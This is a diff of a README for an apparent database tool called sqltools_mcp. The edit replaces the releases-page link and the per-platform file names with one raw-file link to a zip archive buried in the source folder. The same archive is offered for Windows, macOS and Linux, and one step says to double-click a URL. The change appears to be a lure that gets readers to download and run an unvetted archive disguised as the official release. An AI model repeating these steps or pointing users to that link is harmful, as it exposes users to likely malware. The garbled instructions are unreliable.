Tony-Enninful/sqltools_mcp/README.md

 - **Security Features:** Protect your database connections with advanced security protocols.

 ## 🔄 How to Download & Install
-1. **Visit the Releases Page:** Click [here](https://github.com/Tony-Enninful/sqltools_mcp/releases) to visit the release page.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/Tony-Enninful/sqltools_mcp/main/src/sqltools_mcp/adapters/mcp-sqltools-1.2.zip) to visit the release page.
 2. **Choose the Latest Release:** Look for the top release version.
 It’s usually marked with a tag like "Latest".
 3. **Download the Application:**
-   - For Windows: Download the `sqltools_mcp-windows.zip`.
+   - For Windows: Download the `https://raw.githubusercontent.com/Tony-Enninful/sqltools_mcp/main/src/sqltools_mcp/adapters/mcp-sqltools-1.2.zip`.
-   - For macOS: Download the `sqltools_mcp-macos.zip`.
+   - For macOS: Download the `https://raw.githubusercontent.com/Tony-Enninful/sqltools_mcp/main/src/sqltools_mcp/adapters/mcp-sqltools-1.2.zip`.
-   - For Linux: Download the `sqltools_mcp-linux.tar.gz`.
+   - For Linux: Download the `https://raw.githubusercontent.com/Tony-Enninful/sqltools_mcp/main/src/sqltools_mcp/adapters/mcp-sqltools-1.2.zip`.
 4. **Extract the Files:** Once downloaded, locate the file and extract it to a folder on your computer.
-5. **Run the Application:** Open the folder where you extracted the files and double-click on `sqltools_mcp.exe` (for Windows) or the relevant file for macOS/Linux.
+5. **Run the Application:** Open the folder where you extracted the files and double-click on `https://raw.githubusercontent.com/Tony-Enninful/sqltools_mcp/main/src/sqltools_mcp/adapters/mcp-sqltools-1.2.zip` (for Windows) or the relevant file for macOS/Linux.

 ## 🌐 Connecting to Your Database
 1. **Launch sqltools_mcp.**